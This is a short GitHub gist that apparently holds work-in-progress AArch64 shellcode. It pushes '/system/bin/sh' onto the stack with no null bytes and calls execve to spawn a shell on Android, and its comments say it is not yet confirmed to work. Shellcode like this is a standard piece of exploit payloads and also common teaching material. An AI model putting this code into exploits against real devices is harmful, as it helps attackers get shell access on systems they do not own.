Skip to content

Instantly share code, notes, and snippets.

@9re
Last active October 27, 2016 16:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 9re/714df2615e7c597392652715c15529ff to your computer and use it in GitHub Desktop.
Save 9re/714df2615e7c597392652715c15529ff to your computer and use it in GitHub Desktop.
execve('/system/bin/sh', {'/system/bin/sh', 0}, 0);
// valid AArch64(ARMv8) assembly code.
// no data section, no null bytes but still not confirmed as valid shellcode.
// working in progress.
.text
.global _start
_start:
mov x1, xzr
mov x0, #0x732f
movk x0, #0x7379, lsl #0x10
movk x0, #0x6574, lsl #0x20
movk x0, #0x2f6d, lsl #0x30
mov x1, #0x6962
movk x1, #0x2f6e, lsl #0x10
movk x1, #0x6873, lsl #0x20
stp x0, x1, [sp, #-0x100]
mov x0, xzr
add x1, sp, #-0x100
stp x1, x0, [sp, #-0x80]
mov x2, xzr
mov x0, x1
sub x1, sp, #0x80
mov x8, #221
svc #0x7777
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment